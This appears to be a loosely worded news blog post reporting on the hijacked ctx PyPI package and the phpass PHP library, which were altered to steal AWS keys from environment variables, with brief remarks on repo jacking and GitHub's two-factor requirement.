This Python Repositories Hijacking can Take a Big Toll on Your Security!

Let's know how popular Python repositories and PHP libraries were hijacked to steal AWS keys

Python repositories are where software development teams that develop with Python share their code artifacts like libraries, packages, etc. The Python Package Index, or PyPI, is a vast repository of open-source python packages supplied by the worldwide community of Python developers and other publicly available artifacts can be uploaded and downloaded.

The PyPI module ctx, apparently has millions of downloads, and over 20,000 times a week it has been compromised in a software supply chain attack with malicious versions stealing the developer's environment variables. Besides ctx, versions of phpass have millions of downloads that were published to the PHP/Composer package repository Packagist has also been updated in the same way. Two trojanized Python and PHP packages have been uncovered in what's yet another instance of a software supply chain attack targeting the open-source ecosystem.

Public repositories of open sources are in critical part:

Public repositories of open sources such as Maven, NPM, Packages, PyPI, and RubyGems are a critical part of the software supply chain that many organizations rely on to develop applications. Recently, someone replaced the safe "ctx" code with an updated version that steals developer environment variables and collects secrets such as Amazon AWS keys and credentials. The ctx package, now removed from PyPI, is a Python library for accessing Python dictionaries using dot notation.

The ctx is a minimal Python module that lets developers manipulate their dictionary objects in a variety of ways. The package, although popular, had not been touched since 2014 by its developer, as seen by BleepingComputer. The ctx remained unchanged over the past eight years, the module was updated with a malicious code, as was spotted by Reddit users, and later confirmed by ethical hackers.

PHPass, on the other hand, is an open-source password hashing framework, that can be used in PHP applications. And the framework has been downloaded more than two million times.  As per reports, malicious commits were made to the PHPass project this week to steal environment variables. BleepingCompuer also observed malicious commits made to the PHPass project this week that similarly steal environment variables.

The damage done via PHPass was a lot more limited, researchers added. The presence of identical logic and Heroku endpoints within the PyPI and PHP packages indicate a common threat actor being responsible for both of these hijacks. Researchers claim the attacker's identity is obvious. Within PHPass, the altered 'PasswordHash.php' file specifically looks for the 'AWS_ACCESS_KEY' and 'AWS_SECRET_KEY' values in the environment. These secrets are then uploaded to the same Heroku endpoint

However, this could've been a PoC exercise gone wrong and until more information comes to light, it would be irresponsible to name the person behind the ctx and PHPass hijack. Researchers are dubbing these types of attacks as repo jacking, it is an obscure supply chain vulnerability, conceptually similar to subdomain takeover, that impacts over 70,000 open-source projects and affects everything from web frameworks to cryptocurrencies.

Following these attacks, GitHub mandated two-factor authentication for maintainers of Top 100 npm packages and declared extra security improvements. The continuous pattern of danger actors and bug bounty hunters finding novel tactics to infiltrate the software supply chain could very well prompt administrators of other programming vaults to present comparative improvements.